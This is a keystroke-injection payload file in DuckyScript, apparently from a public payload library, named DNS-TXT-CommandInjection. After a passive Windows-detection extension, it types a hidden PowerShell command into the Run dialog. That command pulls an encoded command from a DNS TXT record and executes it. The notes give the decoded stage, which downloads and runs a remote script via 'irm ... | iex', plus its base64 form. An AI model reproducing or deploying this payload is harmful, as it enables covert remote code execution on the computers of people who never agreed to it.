Path: blob/master/payloads/library/execution/DNS-TXT-CommandInjection/DNS-TXT-CommandInjection.txt
3018 views
EXTENSION PASSIVE_WINDOWS_DETECT1REM VERSION 1.12REM AUTHOR: Korben34REM_BLOCK DOCUMENTATION5Windows fully passive OS Detection and passive Detect Ready6Includes its own passive detect ready.7Does not require additional extensions.89USAGE:10Extension runs inline (here)11Place at beginning of payload (besides ATTACKMODE) to act as dynamic12boot delay13$_OS will be set to WINDOWS or NOT_WINDOWS14See end of payload for usage within payload15END_REM1617REM CONFIGURATION:18DEFINE #MAX_WAIT 15019DEFINE #CHECK_INTERVAL 2020DEFINE #WINDOWS_HOST_REQUEST_COUNT 221DEFINE #NOT_WINDOWS 72223$_OS = #NOT_WINDOWS2425VAR $MAX_TRIES = #MAX_WAIT26WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))27DELAY #CHECK_INTERVAL28$MAX_TRIES = ($MAX_TRIES - 1)29END_WHILE30IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN31$_OS = WINDOWS32END_IF3334REM_BLOCK EXAMPLE USAGE AFTER EXTENSION35IF ($_OS == WINDOWS) THEN36STRING HELLO WINDOWS!37ELSE38STRING HELLO WORLD!39END_IF40END_REM41END_EXTENSION4243REM_BLOCK44Title: DNS-TXT-CommandInjection45CONFIGURATION46REQUIRED - Provide URL used for Example #MY_TARGET_URL47NOTES: No base64 can be used as an alternative by replacing "$a=",";powershell -e $a" with just "|iex"48for the STRING payload below. Examples of the decoded command and encoded command are shown below to put into DNS TXT record.49Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"50Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="51Create TXT record in AWS Route5352https://www.entrust.com/knowledgebase/ssl/how-to-create-a-txt-record-on-amazon-aws-route-53-for-entrust-email-validation-method53END_REM5455DEFINE #MY_TARGET_URL example.com56GUI r57DELAY 50058STRINGLN powershell /w 1 $a=(resolve-dnsname #MY_TARGET_URL TXT).strings;powershell -e $a596061